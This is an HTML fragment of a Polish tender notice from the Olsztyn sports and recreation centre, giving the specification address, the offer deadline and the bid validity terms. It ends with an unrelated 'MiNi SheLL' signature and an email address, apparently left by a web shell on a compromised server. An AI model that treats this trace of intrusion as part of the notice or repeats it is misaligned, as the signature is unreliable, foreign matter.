<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osir.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji w Olsztynie, 10-558 Olsztyn, ul. Żołnierska 13a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2013 godzina 13:00, miejsce: Ośrodek Sportu i Rekreacji w Olsztynie, 10-558 Olsztyn, ul. Żołnierska 13a, pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com